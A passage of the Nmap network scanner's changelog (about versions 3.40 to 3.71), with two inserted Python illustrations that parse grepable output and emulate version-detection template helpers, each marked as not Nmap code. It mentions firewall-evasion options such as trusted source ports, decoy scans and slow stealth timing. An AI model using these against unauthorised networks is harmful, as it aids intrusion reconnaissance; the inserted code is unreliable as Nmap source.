such as nmap-services. Note that the implicitly read directory
should be ~/.nmap rather than ~/nmap . So you may have to move any
customized files you now have in ~/nmap . Thanks to nnposter
(nnposter(a)users.sourceforge.net) for reporting the problem and
sending a patch.

o Changed XML output so that the MAC address [address] element comes
right after the IPv4/IPv6 [address] element. Apparently this is
needed to comply with the DTD (
http://www.insecure.org/nmap/data/nmap.dtd ). Thanks to Adam Morgan
(adam.morgan(a)Q1Labs.com) and Florian Ebner
(Florian.Ebner(a)e-bros.de) for the problem reports.

o Fixed an error in the Nmap RPM spec file reported by Pascal Trouvin
(pascal.trouvin(a)wanadoo.fr)

o Fixed a timing problem in which a specified large --send_delay would
sometimes be reduced to 1 second during a scan. Thanks to Martin
Mačok (martin.macok(a)underground.cz) for reporting the problem.

o Fixed a timing problem with sneaky and paranoid modes (-T1 and -T0)
which would cause Nmap to continually scan the same port and never
hit other ports when scanning certain firewalled hosts. Thanks to
Curtis Doty (Curtis(a)GreenKey.net) for reporting the problem.

o Fixed a bug in the build system that caused most Nmap subdirectories
to be configured twice. Changing the variable holding the name of
subdirs from $subdirs to $nmap_cfg_subdirs resolved the problem --
configure must have been using that variable name for its own internal
operations. Anyway, this should reduce compile time significantly.

o Made a trivial change to nsock/src/nsock_event.c to work around "a
bug in GCC 3.3.1 on FreeBSD/sparc64". I found the patch by digging
around the FreeBSD ports tree repository. It would be nice if the
FreeBSD Nmap port maintainers would report such things to me, rather
than fixing it in their own Nmap tree and then applying the patch to
every future version. On the other hand, they deserve some sort of
"most up-to-date" award. I stuck Nmap 3.71-PRE1 in the dist
directory for a few people to test, and made no announcement or
direct link. The FreeBSD crew found it and upgraded anyway :). The
gcc-workaround patch was apparently submitted to the FreeBSD folks
by Marius Strobl (marius(a)alchemy.franken.de).

o Fixed (I hope) an OS detection timing issue which would in some
cases lead to the warning that "insufficient responses for TCP
sequencing (3), OS detection may be less accurate." Thanks to Adam
Kerrison (adam(a)tideway.com) for reporting the problem.

o Modified the warning given when files such as nmap-services exist in
both the compiled in NMAPDATADIR and the current working directory.
That message should now only appear once and is more clear.

o Fixed ping scan subsystem to work a little bit better when
--scan_delay (or some of the slower -T templates which include a scan
delay) is specified. Thanks to Shahid Khan (khan(a)asia.apple.com)
for suggestions.

o Taught connect() scan to properly interpret ICMP protocol
unreachable messages. Thanks to Alan Bishoff
(abishoff(a)arc.nasa.gov) for the report.

o Improved the nmapfe.desktop file to better comply with standards.
Thanks to Stephane Loeuillet (stephane.loeuillet(a)tiscali.fr) for
sending the patch.

Nmap 3.70

o Rewrote core port scanning engine, which is now named ultra_scan().
Improved algorithms make this faster (often dramatically so) in
almost all cases. Not only is it superior against single hosts, but
ultra_scan() can scan many hosts (sometimes hundreds) in parallel.
This offers many efficiency/speed advantages. For example, hosts
often limit the ICMP port unreachable packets used by UDP scans to
1/second. That made those scans extraordinarily slow in previous
versions of Nmap. But if you are scanning 100 hosts at once,
suddenly you can receive 100 responses per second. Spreading the
scan amongst hosts is also gentler toward the target hosts. Nmap
can still scan many ports at the same time, as well. If you find
cases where ultra_scan is slower or less accurate, please send a
report (including exact command-lines, versions used, and output, if
possible) to Fyodor.

o Added --max_hostgroup option which specifies the maximum number of
hosts that Nmap is allowed to scan in parallel.

o Added --min_hostgroup option which specifies the minimum number of
hosts that Nmap should scan in parallel (there are some exceptions
where Nmap will still scan smaller groups -- see man page). Of
course, Nmap will try to choose efficient values even if you don't
specify hostgroup restrictions explicitly.

o Rewrote TCP SYN, ACK, Window, and Connect() scans to use
ultra_scan() framework, rather than the old pos_scan().

o Rewrote FIN, Xmas, NULL, Maimon, UDP, and IP Protocol scans to use
ultra_scan(), rather than the old super_scan().

o Overhauled UDP scan. Ports that don't respond are now classified as
"open|filtered" (open or filtered) rather than "open". The (somewhat
rare) ports that actually respond with a UDP packet to the empty
probe are considered open. If version detection is requested, it
will be performed on open|filtered ports. Any that respond to any of
the UDP probes will have their status changed to open. This avoids
the false-positive problem where filtered UDP ports appear to be
open, leading to terrified newbies thinking their machine is
infected by back orifice.

o Nmap now estimates completion times for almost all port scan types
(any that use ultra_scan()) as well as service scan (version
detection). These are only shown in verbose mode (-v). On scans
that take more than a minute or two, you will see occasional updates
like:
SYN Stealth Scan Timing: About 30.01% done; ETC: 16:04 (0:01:09 remaining)
New updates are given if the estimates change significantly.

o Added --exclude option, which lets you specify a comma-separated
list of targets (hosts, ranges, netblocks) that should be excluded
from the scan. This is useful to keep from scanning yourself, your
ISP, particularly sensitive hosts, etc. The new --excludefile reads
the list (newline-delimited) from a given file. All the work was
done by Mark-David McLaughlin (mdmcl(a)cisco.com) and William McVey
( wam(a)cisco.com ), who sent me a well-designed and well-tested
patch.

o Nmap now has a "port scan ping" system. If it has received at least
one response from any port on the host, but has not received
responses lately (usually due to filtering), Nmap will "ping" that
known-good port occasionally to detect latency, packet drop rate,
etc.

o Service/version detection now handles multiple hosts at once for
more efficient and less-intrusive operation.

o Nmap now wishes itself a happy birthday when run on September 1 in
verbose mode! The first public release was on that date in 1997.

o The port randomizer now has a bias toward putting
commonly-accessible ports (80, 22, etc.) near the beginning of the
list. Getting a response early helps Nmap calculate response times and
detect packet loss, so the scan goes faster.

o Host timeout system (--host_timeout) overhauled to support host
parallelization. Host times are tracked separately, so a host that
finishes a SYN scan quickly is not penalized for an exceptionally
slow host being scanned at the same time.

o When Nmap has not received any responses from a host, it can now
use certain timing values from other hosts from the same scan
group. This way Nmap doesn't have to use absolute-worst-case
(300bps SLIP link to Uzbekistan) round trip timeouts and such.

o Enabled MAC address reporting when using the Windows version
of Nmap. Thanks to Andy Lutomirski (luto(a)stanford.edu) for
writing and sending the patch.

o Workaround crippled raw sockets on Microsoft Windows XP SP2 scans.
I applied a patch by Andy Lutomirski (luto(a)stanford.edu) which
causes Nmap to default to winpcap sends instead. The winpcap send
functionality was already there for versions of Windows such as NT and
Win98 that never supported Raw Sockets in the first place.

o Changed how Nmap sends Arp requests on Windows to use the iphlpapi
SendARP() function rather than creating it raw and reading the
response from the Windows ARP cache. This works around a
(reasonable) feature of Windows Firewall which ignored such
unsolicited responses. The firewall is turned on by default as of
Windows XP SP2. This change was implemented by Dana Epp
(dana(a)vulscan.com).

o Fixed some Windows portability issues discovered by Gisle Vanem
(giva(a)bgnett.no).

o Upgraded libpcap from version 0.7.2 to 0.8.3. This was an attempt
to fix an annoying bug, which I then found was actually in my code
rather than libpcap :).

o Removed Ident scan (-I). It was rarely useful, and the
implementation would have to be rewritten for the new ultra_scan()
system. If there is significant demand, perhaps I'll put it back in
sometime.

o Documented the --osscan_limit option, which saves time by skipping
OS detection if at least one open and one closed port are not found on
the remote hosts. OS detection is much less reliable against such
hosts anyway, and skipping it can save some time.

o Updated nmapfe.desktop file to provide better NmapFE desktop support
under Fedora Core and other systems. Thanks to Mephisto
(mephisto(a)mephisto.ma.cx) for sending the patch.

o Further nmapfe.desktop changes to better fit the freedesktop
standard. The patch came from Murphy (m3rf(a)swimmingnoodle.com).

o Fixed capitalization (with a perl script) of many over-capitalized
vendor names in nmap-mac-prefixes.

o Ensured that MAC address vendor names are always escaped in XML
output if they contain illegal characters (particularly '&'). Thanks
to Matthieu Verbert (mve(a)zurich.ibm.com) for the report and a patch.

o Changed xmloutputversion in XML output from 1.0 to 1.01 to note that
there was a slight change (which was actually the MAC stuff in 3.55).
Thanks to Lionel CONS (lionel.cons(a)cern.ch) for the suggestion.

o Many Windows portability fixes and bug fixes, thanks to a patch from
Gisle Vanem (giva(a)bgnett.no). With these changes, he was able to
compile Nmap on Windows using MingW + gcc 3.4 C++ rather than MS
Visual Studio.

o Removed (addport) tags from XML output. They used to provide open
ports as they were discovered, but don't work now that the port
scanners scan many hosts at once. They did not specify an IP
address. Of course the appropriate (port) tags are still printed
once scanning of a target is complete.

o Configure script now detects GNU/k*BSD systems (whatever those are),
thanks to patch from Robert Millan (rmh@debian.org)

o Fixed various crashes and assertion failures related to the new
ultra_scan() system, that were found by Arturo "Buanzo" Busleiman
(buanzo(a)buanzo.com.ar), Eric (catastrophe.net), and Bill Petersen
(bill.petersen(a)alcatel.com).

o Fixed some minor memory leaks relating to ping and list scanning as
well as the Nmap output table. These were found with valgrind (
http://valgrind.kde.org/ ).

o Provide limited --packet_trace support for TCP connect() (-sT)
scans.

o Fixed compilation on certain Solaris machines thanks to a patch by
Tom Duffy (tduffy(a)sun.com)

o Fixed some warnings that crop up when compiling nbase C files with a
C++ compiler. Thanks to Gisle Vanem (giva(a)bgnett.no) for sending
the patch.

o Tweaked the License blurb on source files and in the man page. It
clarifies some issues and includes a new GPL exception that
explicitly allows linking with the OpenSSL library. Some people
believe that the GPL and OpenSSL licenses are incompatible without
this special exception.

o Fixed some serious runtime portability issues on *BSD systems.
Thanks to Eric (catastrophe.net) for reporting the problem.

o Changed the argument parser to better detect bogus arguments to the
-iR option.

o Removed a spurious warning message relating to the Windows ARP cache
being empty. Patch by Gisle Vanem (giva(a)bgnett.no).

o Removed some C++-style line comments (//) from nbase, because some C
compilers (particularly on Solaris) barf on those. Problem reported
by Raju Alluri

Nmap 3.55

o Added MAC address printing. If Nmap receives packet from a target
machine which is on an Ethernet segment directly connected to the
scanning machine, Nmap will print out the target MAC address. Nmap
also now contains a database (derived from the official IEEE
version) which it uses to determine the vendor name of the target
ethernet interface. The Windows version of Nmap does not yet have
this capability. If any Windows developer types are interested in
adding it, you just need to implement IPisDirectlyConnected() in
tcpip.cc and then please send me the patch. Here are examples from
normal and XML output (angle brackets replaced with [] for HTML
changelog compatibility):
MAC Address: 08:00:20:8F:6B:2F (SUN Microsystems)
[address addr="00:A0:CC:63:85:4B" vendor="Lite-on Communications" addrtype="mac" /]

o Updated the XML DTD to support the newly printed MAC addresses.
Thanks to Thorsten Holz (thorsten.holz(a)mmweg.rwth-aachen.de) for
sending this patch.

o Added a bunch of new and fixed service fingerprints for version
detection. These are from Martin Mačok
(martin.macok(a)underground.cz).

o Normalized many of the OS names in nmap-os-fingerprints (fixed
capitalization, typos, etc.). Thanks to Royce Williams
(royce(a)alaska.net) and Ping Huang (pshuang(a)alum.mit.edu) for
sending patches.

o Modified the mswine32/nmap_performance.reg Windows registry file to
use an older and more compatible version. It also now includes the
value "StrictTimeWaitSeqCheck"=dword:00000001 , as suggested by Jim
Harrison (jmharr(a)microsoft.com). Without that latter value, the
TcpTimedWaitDelay value apparently isn't checked. Windows users
should apply the new registry changes by clicking on the .reg file.
Or do it manually as described in README-WIN32. This file is also
now available in the data directory at
http://www.insecure.org/nmap/data/nmap_performance.reg

o Applied patch from Gisle Vanem (giva(a)bgnett.no) which allows the
Windows version of Nmap to work with WinPCAP 3.1BETA (and probably
future releases). The Winpcap folks apparently changed the encoding
of adapter names in this release.

o Fixed a ping scanning bug that would cause this error message: "nmap:
targets.cc:196: int hostupdate (Target **, Target *, int, int, int,
timeout_info *, timeval *, timeval *, pingtune *, tcpqueryinfo *,
pingstyle): Assertion `pt->down_this_block > 0' failed." Thanks to
Beirne Konarski (beirne(a)neo.rr.com) for reporting the problem.

o If a user attempts -PO (the letter O), print an error suggesting
that they probably mean -P0 (Zero) to disable ping scanning.

o Applied a couple patches (with minor changes) from Oliver Eikemeier
(eikemeier(a)fillmore-labs.com) which fix an edge case relating to
decoy scanning IP ranges that must be sent through different
interfaces, and improves the Nmap response to certain error codes
returned by the FreeBSD firewall system. The patches are from
http://cvsweb.freebsd.org/ports/security/nmap/files/ .

o Many people have reported this error: "checking for type of 6th
argument to recvfrom()... configure: error: Cannot find type for 6th
argument to recvfrom()". In most cases, the cause was a missing or
broken C++ compiler. That should now be detected earlier with a
clearer message.

o Fixed the FTP bounce scan to better detect filtered ports on the
target network.

o Fixed some minor bugs related to the new MAC address printing
feature.

o Fixed a problem with UDP-scanning port 0, which was reported by
Sebastian Wolfgarten (sebastian(a)wolfgarten.com).

o Applied patch from Ruediger Rissmann (RRI(a)zurich.ibm.com), which
helps Nmap understand an EACCES error, which can happen at least
during IPv6 scans from certain platforms to some firewalled targets.

o Renamed ACK ping scan option from -PT to -PA in the documentation.
Nmap has accepted both names for years and will continue to do
so.

o Removed the notice that Nmap is reading target specifications from a
file or stdin when you specify the -iL option. It was sometimes
printed to stdout even when you wanted to redirect XML or grepable
output there, because it was printed during options processing before
output files were handled. This change was suggested by Anders Thulin
(ath(a)algonet.se).

o Added --source_port as a longer, but hopefully easier to remember,
alias for -g. In other words, it tries to use the constant source
port number you specify for probes. This can help against poorly
configured firewalls that trust source port 20, 53, and the like.

o Removed undocumented (and useless) -N option.

o Fixed a version detection crash reported in excellent detail by
Jedi/Sector One (j(a)pureftpd.org).

o Applied patch from Matt Selsky (selsky(a)columbia.edu) which helps
Nmap build with OpenSSL.

o Modified the configure/build system to fix library ordering problems
that prevented Nmap from building on certain platforms. Thanks to
Greg A. Woods (woods(a)weird.com) and Saravanan
(saravanan_kovai(a)HotPop.com) for the suggestions.

o Applied a patch to Makefile.in from Scott Mansfield
(thephantom(a)mac.com) which enables the use of a DESTDIR variable
to install the whole Nmap directory structure under a different root
directory. The configure --prefix option would do the same thing in
this case, but DESTDIR is apparently a standard that package
maintainers like Scott are used to. An example usage is
"make DESTDIR=/tmp/packageroot".

o Removed unnecessary banner printing in the non-root connect() ping
scan. Thanks to Tom Rune Flo (tom(a)x86.no) for the suggestion and
a patch.

o Updated the headers at the top of each source file (mostly to
advance the copyright year to 2004 and note that Nmap is a registered
trademark).

o The SInfo line of submitted fingerprints now provides the target's
OUI (first three bytes of the MAC address) if available. Example:
"M=00A0CC". To save a couple bytes, the "Time" field in SInfo has
been renamed to "Tm". The OUI helps identify the device vendor, and
is only available when the source and target machines are on the
same ethernet network.

Nmap 3.50

o Integrated a ton of service fingerprints, increasing the number of
signatures more than 50%. It has now exceeded 1,000 for the first
time, and represents 180 unique service protocols from acap, afp,
and aim to xml-rpc, zebedee, and zebra.

o Implemented a huge OS fingerprint update. The number of
fingerprints has increased more than 13% to 1,121. This is the first
time it has exceeded 1000. Notable updates include Linux 2.6.0, Mac
OS X up to 10.3.2 (Panther), OpenBSD 3.4 (normal and pf "scrub all"),
FreeBSD 5.2, the latest Windows Longhorn warez, and Cisco PIX 6.3.3.
As usual, there are a ton of new consumer devices from ubiquitous
D-Link, Linksys, and Netgear broadband routers to a number of new IP
phones including the Cisco devices commonly used by Vonage. Linksys
has apparently gone special-purpose with some of their devices, such
as their WGA54G "Wireless Game Adapter" and WPS54GU2 wireless print
server. A cute little MP3 player called the Rio Karma was submitted
multiple times and I also received and integrated fingerprints for the
Handspring Treo 600 (PalmOS).

o Applied some man page fixes from Eric S. Raymond
(esr(a)snark.thyrsus.com).

o Added version scan information to grepable output between the last
two '/' delimiters (that space was previously unused). So the format
is now "portnum/state/protocol/owner/servicename/rpcinfo/versioninfo"
as in "53/open/tcp//domain//ISC Bind 9.2.1/" and
"22/open/tcp//ssh//OpenSSH 3.5p1 (protocol 1.99)/". Thanks to
MadHat (madhat(a)unspecific.com) for sending a patch (although I did
it differently). Note that any '/' characters in the
version (or owner) field are replaced with '|' to keep awk/cut
parsing simple. The service name field has been updated so that it
is the same as in normal output (except for the same sort of
escaping discussed above).
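
A parser for the port field format described above, added here as an illustration (it is not code from Nmap). The tab-separated `Host:` / `Ports:` line layout is an assumption about grepable output, and the sample line and all function names are constructed for the example.

```python
import re

# Field order as given in the changelog entry above.
FIELDS = ("portnum", "state", "protocol", "owner",
          "servicename", "rpcinfo", "versioninfo")

# A port number followed by six '/'-terminated fields. Fields never contain
# '/' themselves because Nmap rewrites it to '|' in the free-text ones.
PORT_ENTRY = re.compile(r"(\d+)/" + r"([^/]*)/" * 6)


def parse_ports(ports_field):
    """Parse the value of a 'Ports:' field into a list of dicts.

    Entries are located by counting '/' delimiters, not by splitting on
    ", ", so a comma inside the version string does not split an entry.
    """
    entries, pos = [], 0
    while pos < len(ports_field):
        m = PORT_ENTRY.match(ports_field, pos)
        if m is None:
            raise ValueError("malformed port entry at offset %d" % pos)
        entry = dict(zip(FIELDS, m.groups()))
        entry["portnum"] = int(entry["portnum"])
        entries.append(entry)
        pos = m.end()
        if ports_field.startswith(", ", pos):
            pos += 2          # separator between two entries
        elif pos != len(ports_field):
            raise ValueError("unexpected text at offset %d" % pos)
    return entries


def parse_host_line(line):
    """Return (host, port_entries) for one grepable 'Host:' line."""
    host, ports = None, []
    for field in line.rstrip("\n").split("\t"):
        key, _, value = field.partition(": ")
        if key == "Host":
            host = value.split(" ", 1)[0]
        elif key == "Ports":
            ports = parse_ports(value.strip())
    return host, ports


def open_services(line):
    """(portnum, servicename, versioninfo) for every open port on the line."""
    _, ports = parse_host_line(line)
    return [(p["portnum"], p["servicename"], p["versioninfo"])
            for p in ports if p["state"] == "open"]


# Constructed sample line. The '|' in the Apache entry stands where the
# original version string had '/'; that rewrite cannot be undone reliably
# because a literal '|' would look the same.
SAMPLE_LINE = (
    "Host: 192.0.2.10 (ns.example.test)\t"
    "Ports: 22/open/tcp//ssh//OpenSSH 3.5p1 (protocol 1.99)/, "
    "53/open/tcp//domain//ISC Bind 9.2.1/, "
    "80/open/tcp//http//Apache httpd 2.0.48 ((Unix) mod_ssl|2.0.48, DAV|2)/, "
    "6000/open/tcp//X11///\t"
    "Ignored State: closed (1653)"
)

if __name__ == "__main__":
    for port, service, version in open_services(SAMPLE_LINE):
        print(port, service, version or "(no version info)")
```
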

o Integrated an Oracle TNS service probe and match lines contributed
by Frank Berger (fm.berger(a)gmx.de). New probe contributions are
always appreciated!

o Fixed a crash that could happen during SSL version detection due to
SSL session ID cache reference counting issues.

o Applied patch from Rob Foehl (rwf(a)loonybin.net) which fixes the
--with_openssl=DIR configure argument.

o Applied patch to nmap XML dtd (nmap.dtd) from Mario Manno
(mm(a)koeln.ccc.de). This accounts for the new version scanning
functionality.

o Updated the Windows build system so that you don't have to manually
copy nmap-service-probes to the output directory. I also updated
the README-WIN32 to elaborate further on the build process.

o Added configure option --with-libpcre=included which causes Nmap to
build with its included version of libpcre even if an acceptable
version is available on the system.

o Upgraded to Autoconf 2.59 (from 2.57). This should help HP-UX
compilation problems reported by Petter Reinholdtsen
(pere(a)hungry.com) and may have other benefits as well.

o Applied patch from Przemek Galczewski (sako(a)avet.com.pl) which
adds spaces to the XML output in places that apparently help certain
older XML parsers.

o Made Ident-scan (-I) limits on the length and type of responses
stricter so that rogue servers can't flood your screen with 1024
characters. The new length limit is 32. Thanks to Tom Rune Flo
(tom(a)x86.no) for the suggestion and a patch.

o Fingerprints for unrecognized services can now be a bit longer to
avoid truncating as much useful response information. While the
fingerprints can be longer now, I hope they will be less frequent
because of all the newly recognized services in this version.

o The nmap-service-probes "match" directive can now take a service
name like "ssl/vmware-auth". The service will then be reported as
vmware-auth (or whatever follows "ssl/") tunneled by SSL, yet Nmap
won't actually bother initiating an SSL connection. This is useful
for SSL services which can be fully recognized without the overhead
of making an SSL connection.

o Version scan now chops commas and whitespace from the end of
vendorproductname, version, and info fields. This makes it easier to
write templates incorporating lists. For example, the tcpmux service
(TCP port 1) gives a list of supported services separated by CRLF.
Nmap uses this new feature to print them comma separated without
having an annoying trailing comma as so (linewrapped):
match tcpmux m|^(sgi_[-.\w]+\r\n([-.\w]+\r\n)*)$|
v/SGI IRIX tcpmux//Available services: $SUBST(1, "\r\n", ",")/

Nmap 3.48

o Integrated an enormous number of version detection service
submissions. The database has almost doubled in size to 663
signatures representing the following 130 services:
3dm-http afp apcnisd arkstats bittorent chargen citrix-ica
cvspserver cvsup dantzretrospect daytime dict directconnect domain
echo eggdrop exec finger flexlm font-service ftp ftp-proxy gnats
gnutella-http hddtemp hp-gsg http http-proxy hylafax icecast ident
imap imaps imsp ipp irc ircbot irc-proxy issrealsecure jabber
kazaa-http kerberos-sec landesk-rc ldap linuxconf lmtp lotusnotes
lpd lucent-fwadm meetingmaker melange microsoft-ds microsoft-rdp
mldonkey msactivesync msdtc msrpc ms-sql-m mstask mud mysql
napster ncacn_http ncp netbios-ns netbios-ssn netrek netsaint
netstat netwareip networkaudio nntp nsclient nsunicast ntop-http
omniback oracle-mts oracle-tns pcanywheredata pksd pmud pop2 pop3
pop3s poppass postgresql powerchute printer qotd redcarpet
rendezvous rlogind rpc rsync rtsp sdmsvc sftp shell shivahose
sieve slimp3 smtp smux snpp sourceoffice spamd ssc-agent ssh ssl
svrloc symantec-av symantec-esm systat telnet time tinyfw upnp
uucp veritasnetbackup vnc vnc-http vtun webster whois wins
winshell wms X11 xfce zebra

o Added the ability to execute "helper functions" in version
templates, to help clean up/manipulate data captured from a server
response. The first defined function is P() which includes only
printable characters in a captured string. The main impetus for
this is to deal with Unicode strings like
"W\0O\0R\0K\0G\0R\0O\0U\0P\0" that many MS protocols send. Nmap can
now decode that into "WORKGROUP".

o Added SUBST() helper function, which replaces strings in matched
appname/version/extrainfo strings with something else. For example,
VanDyke Vshell gives a banner that includes
"SSH-2\.0-VShell_2_2_0_528". A substring match is used to pick out
the string "2_2_0_528", and then SUBST(1,"_",".") is called on that
match to form the version number 2.2.0.528.
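
A Python emulation of the template helpers described above (P() and SUBST() here, plus the trailing comma and whitespace trimming from the 3.50 notes), added as an illustration and not Nmap's own code. The tcpmux match line is the one quoted on this page; the VShell and workgroup match lines, the sample responses and all function names are constructed for the example.

```python
import re

# Template references handled here: $N, $P(N) and $SUBST(N,"old","new").
_HELPER = re.compile(
    r'\$(?:(?P<plain>\d)'
    r'|P\((?P<p>\d)\)'
    r'|SUBST\((?P<s>\d),\s*"(?P<old>[^"]*)",\s*"(?P<new>[^"]*)"\))'
)
# Backslash escapes as they are written inside SUBST() arguments.
_ESCAPES = {r"\r": "\r", r"\n": "\n", r"\t": "\t", r"\0": "\0"}


def _unescape(arg):
    for seq, char in _ESCAPES.items():
        arg = arg.replace(seq, char)
    return arg


def _captured(m, index):
    """Bytes of capture group `index`, or b"" if it did not participate."""
    return m.group(int(index)) or b""


def expand_field(field, m):
    """Expand one template field against regex match `m` on the response."""
    def repl(h):
        if h.group("plain") is not None:      # $N: raw capture, unfiltered
            return _captured(m, h.group("plain")).decode("latin-1")
        if h.group("p") is not None:          # $P(N): printable ASCII only
            raw = _captured(m, h.group("p"))
            return bytes(b for b in raw if 0x20 <= b <= 0x7E).decode("ascii")
        text = _captured(m, h.group("s")).decode("latin-1")
        return text.replace(_unescape(h.group("old")),
                            _unescape(h.group("new")))
    # Chop commas and whitespace from the end, as the 3.50 entry describes.
    return _HELPER.sub(repl, field).rstrip(", \t\r\n")


def version_info(match_regex, template, response):
    """Apply a v/product/version/info/ template; None if the regex misses."""
    m = re.search(match_regex, response)
    if m is None:
        return None
    parts = template.split("/")
    if parts[0] != "v" or len(parts) < 5:
        raise ValueError("expected v/product/version/info/")
    product, version, info = (expand_field(p, m) for p in parts[1:4])
    return {"product": product, "version": version, "info": info}


# Match line from this page, run against a constructed tcpmux response.
TCPMUX = version_info(
    rb'^(sgi_[-.\w]+\r\n([-.\w]+\r\n)*)$',
    r'v/SGI IRIX tcpmux//Available services: $SUBST(1, "\r\n", ",")/',
    b"sgi_mountd\r\nsgi_toolkitbus\r\nnfs\r\n",
)

# Constructed match line for the VShell banner quoted above.
VSHELL = version_info(
    rb'^SSH-2\.0-VShell_([\d_]+)',
    r'v/VanDyke VShell/$SUBST(1,"_",".")//',
    b"SSH-2.0-VShell_2_2_0_528 VShell\r\n",
)

# Constructed response carrying "WORKGROUP" with a NUL after each letter.
WIDE = b"\x00\x00W\x00O\x00R\x00K\x00G\x00R\x00O\x00U\x00P\x00\x00\x00"
WITH_P = version_info(rb'((?:[A-Z]\x00)+)', 'v/Constructed service//$P(1)/', WIDE)
WITHOUT_P = version_info(rb'((?:[A-Z]\x00)+)', 'v/Constructed service//$1/', WIDE)

if __name__ == "__main__":
    for result in (TCPMUX, VSHELL, WITH_P):
        print(result)
```

P() as emulated here simply drops bytes outside the printable ASCII range, so the plain `$1` form still carries the NUL bytes into the output while `$P(1)` does not.
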

o If responses to a probe fail to match any of the registered match
strings for that probe, Nmap will now try against the registered "null
probe" match strings. This helps in the case that the NULL probe
initially times out (perhaps because of initial DNS lookup) but the
banner appears in later responses.

o Applied some portability fixes (particularly for OpenBSD) from Chad
Loder (cloder(a)loder.us), who is also now the OpenBSD Nmap port
maintainer.

o Applied some portability fixes from Marius Strobl
(marius(a)alchemy.franken.de).

o The tarball distribution of Nmap now strips the binary at install
time thanks to a patch from Marius Strobl
(marius(a)alchemy.franken.de).

o Fixed a problem related to building Nmap on systems that lack PCRE
libs (and thus have to use the ones included by Nmap). Thanks to Remi
Denis-Courmont (deniscr6(a)cti.ecp.fr) for the report and patch.

o Alphabetized the service names in each Probe section in
nmap-service-probes (makes them easier to find and add to).

o Fixed the problem several people reported where Nmap would quit with
a "broken pipe" error during service scanning. Thanks to Jari Ruusu
(jari.ruusu(a)pp.inet.fi) for sending a patch. The actual error
message was "Unexpected error in NSE_TYPE_READ callback. Error
code: 32 (Broken pipe)"

o Fixed protocol scan (-sO), which I had broken when adding the new
output table format. It would complain "NmapOutputTable.cc:128:
failed assertion `row < numRows'". Thanks to Matt Burnett
(marukka(a)mac.com) for notifying me of the problem.

o Upgraded Libpcap to the latest tcpdump.org version (0.7.2) from
0.7.1

o Applied a patch from Peter Marschall (peter(a)adpm.de) which adds
version detection support to nmapfe.

o Fixed a problem with XML output being invalid when service detection
was done on SSL-tunneled ports. Thanks to the several people who
reported this - it means that folks are actually using the XML
output :).

o Fixed (I hope) some Solaris Sun ONE compiler compilation problems
reported (w/patches) by Mikael Mannstrom (candyman(a)penti.org)

o Fixed the --with-openssl configure option for people who have
OpenSSL installed in a path not automatically found by their
compilers. Thanks to Marius Strobl (marius(a)alchemy.franken.de) for
the patch.

o Made some portability changes for HP-UX and possibly other types of
machines, thanks to a patch from Petter Reinholdtsen (pere(a)hungry.com)

o Applied a patch from Matt Selsky (selsky(a)columbia.edu) which fixes
compilation on some Solaris boxes, and maybe others. The error said
"cannot compute sizeof (char)"

o Applied some patches from the NetBSD ports tree that Hubert Feyrer
(hubert.feyrer(a)informatik.fh-regensburg.de) sent me. The NetBSD
Nmap ports page is at http://www.NetBSD.org/packages/net/nmap/ .

o Applied some Makefile patches from the FreeBSD ports tree that I
found at http://www.freebsd.org/cgi/cvsweb.cgi/ports/security/nmap/files/

Nmap 3.45

o Integrated more service signatures from MadHat
(madhat(a)unspecific.com), Brian Hatch (bri(a)ifokr.org), Niels
Heinen (zillion(a)safemode.org), Solar Designer
(solar(a)openwall.com), Seth Master
(smaster(a)stanford.edu), and Curt Wilson
(netw3_security(a)hushmail.com). We now have 378 signatures
recognizing 86 unique service protocols.

o Added new HTTPOptions and RTSPRequest probes suggested by MadHat
(madhat(a)unspecific.com)

o Changed the .spec file to compile Nmap RPMs without SSL support to
improve compatibility (some users might not have OpenSSL, and even
those who do might not have the right version: libopenssl.so.2 vs
libopenssl.so.4, etc.).

o Applied a patch from Solar Eclipse (solareclipse(a)phreedom.org)
which increases the allowed size of the 'extrainfo' version field from
80 characters to 128. The main benefit is to allow longer apache module
version strings.

o Fixed Windows compilation and improved the Windows port slightly (no
more macro to redefine read()).

o Applied some updates to README-WIN32 sent in by Kirby Kuehl
(kkuehl(a)cisco.com). He improved the list of suggested registry
changes and also fixed a typo or two. He also attached a .reg file
to automate the Nmap connect() scan performance enhancing registry
changes. I am now including that with the Nmap Windows binary .zip
distribution (and in mswin32/ of the source distro).

o Applied a one-line patch from Dmitry V. Levin (ldv(a)altlinux.org)
which fixes a test Nmap does during compilation to see if an existing
libpcap installation is recent enough.

Nmap 3.40PVT17

o Wrote and posted a new paper on version scanning to
http://www.insecure.org/nmap/versionscan.html . Updated
nmap-service-probes and the Nmap man page to simply refer to this
URL.

o Integrated more service signatures from my own scanning as well as
contributions from Brian Hatch (bri(a)ifokr.org), MadHat
(madhat(a)unspecific.com), Max Vision (vision(a)whitehats.com), HD
Moore (hdm(a)digitaloffense.net), Seth Master
(smaster(a)stanford.edu), and Niels Heinen (zillion(a)safemode.org).
MadHat also contributed a new probe for Windows Media Service. Many
people sent a LOT of signatures, which has allowed
nmap-service-probes to grow from 295 to 356 signatures representing
85 service protocols!

o Applied a patch (with slight changes) from Brian Hatch
(bri(a)ifokr.org) which enables caching of SSL sessions so that
negotiation doesn't have to be repeated when Nmap reconnects to the same
between probes.

o Applied a patch from Brian Hatch (bri(a)ifokr.org) which optimizes the
requested SSL ciphers for speed rather than security. The list was
based on empirical evidence from substantial benchmarking he did with
tests that resemble nmap-service-scanning.

o Updated the Nmap man page to discuss the new version scanning
options (-sV, -A).

o I now include nmap-version/aclocal.m4 in the distribution as this is
required to rebuild the configure script (thanks to Dmitry V. Levin
(ldv(a)altlinux.org) for notifying me of the problem).

o Applied a patch from Dmitry V. Levin (ldv(a)altlinux.org) which
detects whether the PCRE include file is or

o Applied a patch from Dmitry V. Levin (ldv(a)altlinux.org) which
fixes typos in some error messages. The patch apparently came from
the highly-secure and stable Owl and Alt Linux distributions. Check
them out at http://www.openwall.com/Owl/ and
http://www.altlinux.com/

o Fixed compilation on Mac OS X - thanks to Brian Hatch
(bri(a)ifokr.org) and Ryan Lowe (rlowe(a)pablowe.net) for giving me
access to Mac OS X boxes.

o Stripped down libpcre build system to remove libtool dependency and
other cruft that Nmap doesn't need. (this was mostly a response to
libtool-related issues on Mac OS X).

o Added a new --version_trace option which causes Nmap to print out extensive
debugging info about what version scanning is doing (this is a subset
of what you would get with --packet_trace). You should usually use
this in combination with at least one -d option.

o Fixed a port number printing bug that would cause Nmap service
fingerprints to give a negative port number when the actual port was
above 32K. Thanks to Seth Master (smaster(a)stanford.edu) for finding
this.

o Updated all the header text again to clarify our interpretation of
"derived works" after some suggestions from Brian Hatch
(bri(a)ifokr.org)

